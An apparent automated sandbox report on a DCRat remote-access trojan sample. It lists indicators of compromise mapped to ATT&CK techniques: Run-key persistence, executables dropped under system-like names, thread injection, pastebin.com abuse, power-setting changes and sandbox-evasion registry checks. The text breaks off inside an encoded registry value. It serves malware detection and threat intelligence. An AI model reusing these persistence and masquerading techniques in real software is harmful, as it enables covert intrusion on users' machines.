dcrat | ad8d4a6b44aa1d12db0966ddcf16e07942efce4e3f7303c0845864f7f18bbc91

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	NerestPCFree 0.31.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	MpDefenderCoreService.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	MsServerHost.exe

Executes dropped EXE 4 IoCs

pid	Process
2660	MpDefenderCoreService.exe
4052	twain32.exe
3552	updater.exe
1660	MsServerHost.exe

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\Default\\Cookies\\unsecapp.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\Default\\Cookies\\unsecapp.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Containers\\serviced\\WmiPrvSE.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\WindowsRE\\services.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\WindowsRE\\services.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Java\\Registry.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Java\\Registry.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Downloaded Program Files\\RuntimeBroker.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Downloaded Program Files\\RuntimeBroker.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\""	MsServerHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\""	MsServerHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
16	pastebin.com
17	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1704	powercfg.exe
2264	powercfg.exe
3252	cmd.exe
3032	powercfg.exe
1088	powercfg.exe
2756	cmd.exe
816	powercfg.exe
1532	powercfg.exe
4424	powercfg.exe
4960	powercfg.exe

Drops file in System32 directory 19 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	lsass.exe
File opened for modification	C:\Windows\System32\Tasks\WmiPrvSE	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RuntimeBroker	svchost.exe
File created	\??\c:\Windows\System32\CSC32FC33ECE203443ABA9072655949BF63.TMP	csc.exe
File created	\??\c:\Windows\System32\kpkopw.exe	csc.exe
File opened for modification	C:\Windows\System32\Tasks\WmiPrvSEW	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RegistryR	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\MsServerHost	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\services	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\unsecappu	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\unsecapp	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Registry	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\MsServerHostM	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\servicess	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RuntimeBrokerR	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4052 set thread context of 1228	4052	twain32.exe	98
PID 3552 set thread context of 2728	3552	updater.exe	121
PID 3552 set thread context of 244	3552	updater.exe	128
PID 3552 set thread context of 2140	3552	updater.exe	129

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	twain32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Java\Registry.exe	MsServerHost.exe
File created	C:\Program Files\Java\ee2ad38f3d4382	MsServerHost.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Containers\serviced\WmiPrvSE.exe	MsServerHost.exe
File created	C:\Windows\Containers\serviced\24dbde2999530e	MsServerHost.exe
File created	C:\Windows\Downloaded Program Files\RuntimeBroker.exe	MsServerHost.exe
File opened for modification	C:\Windows\Downloaded Program Files\RuntimeBroker.exe	MsServerHost.exe
File created	C:\Windows\Downloaded Program Files\9e8d7a4ca61bd9	MsServerHost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3408	sc.exe
3708	sc.exe
1516	sc.exe
1996	sc.exe
1452	sc.exe
3452	sc.exe
4388	sc.exe
212	sc.exe
4760	sc.exe
3436	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NerestPCFree 0.31.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MpDefenderCoreService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
624	PING.EXE

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Request Saturday, December 14, 2024 16:59:30 = "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"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nuskzkuabdezag\DeviceId = "<Data LastUpdatedTime=\"1734195541\"><User username=\"02NUSKZKUABDEZAG\"/></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02jjupzaogyqpeni\DeviceId = "<Data><User username=\"02JJUPZAOGYQPENI\"><HardwareInfo BoundTime=\"1734195572\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nuskzkuabdezag	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02hffkmccggumxty\AppIdList	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Response Saturday, December 14, 2024 16:59:30 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAgRBJXUqky0G2dX6yRyxuUQAAAAACAAAAAAAQZgAAAAEAACAAAABDFAZ5FEWOQEqwLmemHuZ3r3uJFzU21DUP1dCG8GdBoAAAAAAOgAAAAAIAACAAAADi2DqclWnfzHI2gqltPyyA4NF47Ju44hyVmHLiFT64N4AHAAAZ3FSfazQr3R8Y9YkKg9RDVqSpVO1kLSx6CwY1c45V1gCrKxb5iOyGa4Rtmp2sgmGuyW2GoIQTeL37gAT3LDwF3EkgX43f0vzYrAvb2ZgW/kr4z54nv4V6GaZsTOW4N9IVAFdNupBSKrG6Cu64RxNy+4WrhoRI+67wwwqSqvrXPf7TppauT0/bQVwpTbleUw4Id3iV1nYp/HP1UDKMv/QkmKkXBVk/1NukqsP2ZL3CcHI3WckePV8NypC932E0LtAzKqx3ByVQ1RxfOXIQCddIzNV61eenxBrwj/Z6JssIfvCfRG175D7jW3xLj36EFq2hh1iHd7v4YaGLEfuktZhDb2pFplqRIyCe2NvAQNIy2jWKq7CGbhXPBaxz5YrkbZWr3Ccr7G4L5EW6oPzumf6mJGZKMVzJh2c41C+Xky4+vPfi42Hxg2mqKJt+MUmtUuBY4w9XOvHL0I4pUrmiWmFnBnZy42kvGlo3xyOvYX+HJyxDS+SXkEuObE7qmXMdwshX2oIb8bJ/PQIeIqNS8QeI9FYyBgpmfwuyrwtBxjwCAjhDbsK8SHz0Fz1z4a838nJhr4Fdnzc+M6NyVyU4qfE7SMo6p/x68gAIxMQOpWTpZ+n90ZELI55i9niXqrCpT+A2JECYRpxuYxknkAHgTz++5yJDrR8CvlC4McPdDD6NGAoWmczAeudrv8r4lmWkeb90OHkITay0Cz0bxZj2GQMGeMVSyEseuq+8LXdznHqQ6I18k42adUSbIjd1rQ+Pxp9Ql5LzqL2OoMcTzY0GLmBzFgAy5kJslADu0EmN7rj2EltsVLvnAL5qYq65sZ+0orTSeBFr1vNuuaUiGetOatVC/ZQd7R5GYuF54jXkNyMsjhXjanROWlyB23egml7EP52vtZlnbvrku1eYdUrL45WcrnAx47CbX/xGQkTUBF9t8MJgTTEphGsqdGQ0Qbobf/zFDkOz/lY6SQCUHFBglAy8i+atcQHe6kzqSzJcD8CnN5Z53XV/hj/zZanCpBwf25j8XSQQsZ69U2+50Mz8ClboxejBlPJTu6XwxoHpxyzS5RLOTaA22Q8kkx1fKVPo7hIrq7h8skJPNDazdLsHI3BnXis5ZNm